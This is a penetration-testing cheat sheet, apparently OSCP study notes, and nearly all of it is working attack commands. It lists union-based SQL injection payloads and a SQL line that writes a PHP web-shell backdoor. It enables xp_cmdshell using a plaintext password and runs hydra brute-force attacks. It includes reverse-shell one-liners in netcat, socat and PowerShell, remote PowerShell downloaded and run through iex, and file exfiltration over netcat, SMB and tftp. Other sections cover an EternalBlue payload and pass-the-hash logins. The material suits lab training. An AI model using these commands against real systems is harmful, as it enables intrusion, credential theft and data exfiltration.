- Web application
- Services
- Password Attacks
- SMB and NETBIOS
- NFS Shares
- All the Shells
- File transfers
- Misc
When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
- Does it initiate an HTTP or HTTPS connection?
- Does it access a web application specific path or route?
- Does the exploit leverage a pre-authentication vulnerability?
- If not, how does the exploit authenticate to the web application?
- How are the GET or POST requests crafted to trigger and exploit the vulnerability?
- Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
- Will oddities such as self-signed certificates disrupt the exploit?
- Use
‘and“to look for possible errors - use
#and--for comments after the injection. (After the ``-- ``` a space is required_- If
--in url the add something behind it so the space doesn't get truncated. For example-- \\
- If
- If returning multiple rows gives errors use
LIMIT 1in the query - use
ORDER BYto find the amount of columns. Increment it by 1 till no output is shown. - use
load_file('C:/Windows/System32/drivers/etc/hosts')to load files instead of database data. - use
"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '<PATH TO WEBROOT>/backdoor.php'to create a simple php backdoor.
- https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- Find the SQL injecton
- Use
‘and“to look for possible errors. - Vunerable value for example is
artist=1
- Use
- Find the amount of columns
- use
artist=1 ORDER BY 1. Increment it by 1 till no output or error is given. Ifartist=1 ORDER BY 4gives an error, the amount of columns is 3.
- use
- Use a union based SQL injection
- use
artist=1 union select 1,2,3(amount of columns). If no other output is given:- use wrong output
artist=-1 union select 1,2,3 - If its a string use
artist=-1 union select NULL,NULL,NULL
- use wrong output
- use
- Fetch the name of the database and version/current user
artist=-1 union select 1,database(),3-1 union select 1,version(),current_user()
- Fetch the table names inside the database
- Retrieve all table names
artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
- Get first table name (Limited by first because of the
limit 0,1)artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
- Get the second table name (Limited by second because of the
limit 1,1)artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
- Get the rest of the table names
- Retrieve all table names
- Retrieve columns names
artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'
- Get data out of the columns
artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>
show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;
mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell 'whoami'
- Is the webserver running ISS, PHP? What is it running
- ISS = .asp, .aspx
- PHP = .php
- Java = .jsp
/opt/SecLists/Discovery/Web-Content/web-extensions.txt
- Check if login is allowed as anonymous:anonymous.
nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1
RETR 2
evil-winrm -u <USER> -p <PASS> -i <IP>
https://github.com/danielmiessler/SecLists
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>
Login using Burp or check in developers tools to check the request for the required information! You need to get the username/password/login parameter and the error message!
https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"
#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"
#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'
cewl <URL> -m <MIN CHARS> -w <FILE>.txt
hashid <HAS>
hash-identiefier
Unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt
Portmapper and RPCBind run on TCP port 111
rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script *nfs*
showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT> //<IP>/<SHARE> -o username=<USERNAME>,password=<PASSWORD> /mnt/<FOLDER>
If a file found which we want to access but don’t have permissions. Make a user with the same username and change the UUID, change to the user so we can access the file.
sudo adduser pwn
sudo vim /etc/passwd
- msfvenom https://netsec.ws/?p=331
sudo nc -nlvp <PORT>
sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT
msfconsole
use multi/handler
set payload <PAYLOAD>
run
. ./powercat.ps1
powercat -l -v -p 10000
- Generator tool https://github.com/mthbernardes/rsg
nc -nv <IP> <PORT> -e /bin/bash
socat TCP4:<IP>:<PORT> EXEC:/bin/bash
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powercat -c <IP> -p <PORT> -e cmd.exe
nc -nlvp <PORT>
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'P
powercat -l -p <PORT> -e cmd.exe
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
- In your active shell press
bgto send your nc session to background - Enter
stty raw -echo - Enter
fgto bring your nc session to foreground - ```export TERM=xterm-256color``
sudo service apache2 start #files in /var/www/html
sudo python3 -m http.server <PORT> #files in current
sudo python2 -m SimpleHTTPServer <PORT>
sudo php -S 0.0.0.0:<PORT>
sudo ruby -run -e httpd . -p <PORT>
sudo busybox httpd -f -p <PORT>
wget http://<IP>:<PORT>/<FILE>
sudo python3 /opt/oscp/impacket/examples/smbserver.py <SHARE NAME> <PATH>
dir \\<IP>\<SHARE NAME>
copy \\<IP>\<SHARE NAME>\<FILE NAME> <FILE>
copy \\<IP>\<SHARE NAME>\<FILE NAME>\*.* .
copy <FILE> \\<IP>\<SHARE NAME>\<FILE NAME>
If installed use the ftp package
Use native program with the -s parameter to use a input file for the commands
echo open 192.168.119.124 21> ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET accesschk.exe >> ftp.txt
echo GET winPEASany.exe >> ftp.txt
echo quit >> ftp.txt
ftp -v -n -s:ftp.txt
Create vbs script
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run VBS script to download file
cscript wget.vbs http://<IP>/<FILE> <FILE>
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/<FILE>', '<FILE>')
powershell -c "Invoke-WebRequest -Uri 'http://<IP>/<FILE>' -OutFile 'C:\Windows\Temp\<FILE>'"
nc -nlvp <PORT> > <FILE>
nc -nv <IP> <PORT> <FILE>
sudo socat TCP4-LISTEN:<PORT>,fork file:<FILE>
socat TCP4:<IP>:<PORT> file:<FILE>,create
powercat -c <IP> -p <PORT> -i <FILE>
make /var/www/upload.php on kali
<?php
$uploaddir = '/var/www/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
Upload file in Windows client
powershell (New-Object System.Net.WebClient).UploadFile('http://<IP>/upload.php', '<FILE>')
Install tftp on kali
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On windows client to send file
tftp -i <IP> put important.docx
powercat -c <IP> -p <PORT> -i <FILE>
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe
<?php
// Return the listing of the directory where the file runs (Windows)
system("dir");
?>
<?php
// Executes but returns nothing
exec("ls -la");
?>
<?php
// Executes, returns the entire output as a string
echo shell_exec("ls -la");
?>
<?php
// Executes, returns output in raw format
passsthru("ls -la");
?>
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
First is a empty LM HASH, last one should work as well.
pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd
https://www.exploit-db.com/exploits/46249
Start without tmux a /bin/bash shell
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=screen